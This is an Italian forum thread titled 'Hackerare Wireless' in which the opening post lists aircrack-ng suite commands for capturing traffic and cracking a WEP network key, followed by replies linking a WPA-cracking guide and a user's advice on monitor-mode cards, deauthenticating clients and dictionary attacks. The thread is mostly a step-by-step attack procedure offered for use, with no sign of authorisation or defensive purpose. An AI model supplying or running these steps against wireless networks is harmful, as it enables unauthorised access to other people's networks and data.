Hackerare Wireless

« Older   Newer »
  Share  
The-Future 97
view post Posted on 14/4/2010, 14:00







TERMINAL COMMANDS:
Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]
 
Top
Aliencode
view post Posted on 14/4/2010, 14:03




ci ho già provato e non funziona.....
 
Top
Spartan//hack;
view post Posted on 18/4/2010, 22:50




se volete una vera guida provate con la mia..
www.fileden.com/files/2009/5/14/2441990/Cracking_WPA.pdf
 
Top
Aliencode
view post Posted on 19/4/2010, 06:27




vediamo proverò sulla mia linea anche se ho seriamente dei dubbi che funzioni.....
 
Top
Spartan//hack;
view post Posted on 19/4/2010, 18:51




fidati.. l'ho fatta io sulla mia... è semplicissimo.. basta avere un pò di gestione su konsole e la guida nn serve manco
 
Top
devilazz
view post Posted on 20/12/2010, 16:37




provo anch'io
 
Top
OzzFan
view post Posted on 8/4/2011, 12:24




questa guida dice solo come si fa l'attacco ma non tutta una lunga premessa quindi non è completa...non starò a dilungarmi ma inanzitutto sconsiglio backtrack come primo utilizzo,meglio ubuntu che configura il vostro hardware da solo senza troppi problemi..seconda cosa dovete avere una scheda di rete compatibile con il monitor mode,cioè non basta seguire questa procedura ma bisogna appunto verificare che non siano necessari driver patchati per il monitor mode ecc..

insomma prima di arrivare direttamente alla fine bisognerebbe fare una serie di verifiche ed installazioni di pacchetti..ribadisco che per chi è alle prime armi in ambiente unix (ovvero linux) è meglio partire con ubuntu altrimenti avreste un milione di problemi se backtrack non configura delle cose per voi

inoltre nella guida ci sono degli errori..per esempio "Come avrete capito, ora ci tocca autenticare un client." è sbagliata perchè il client si deve deautenticare,questo implica (cosa che non è scritta nella guida) che ci dev'essere almeno un client connesso nella rete altrimenti potete stare li anche anni non otterrete un bel niente..un'altra cosa è che il dizionario delle pass italiana di solito è il meno efficace per questi attacchi..più il dizionario è corposo più siete sicuri di riuscire a decriptare la password..ovviamente questo rallenta mooolto il pc perchè il processore va al massimo per cui dovreste sfruttare la potenza di calcolo delle gpu che vanno circa 100 volte + veloci dei processori..

insomma senza dilungarmi troppo non voglio offendere assolutamente nessuno ma vi dico che questa guida è incompleta e sotto certi punti è ambigua..pregate per il mio tempo libero che ve la faccio io una guida qui sul forum...

ah dimenticavo con questa tecnica ci vuole moooooooooolto c**o perchè se la pass non è contenuta nel dizionario avete fatto un bel lavoro per senza niente e dovreset andarci di BruteForce ma impiegereste oltre i 1000 anni :)
 
Top
Aliencode
view post Posted on 12/4/2011, 17:19




Bravo Ozz ottimi chiarimenti..
 
Top
7 replies since 14/4/2010, 14:00   122 views
  Share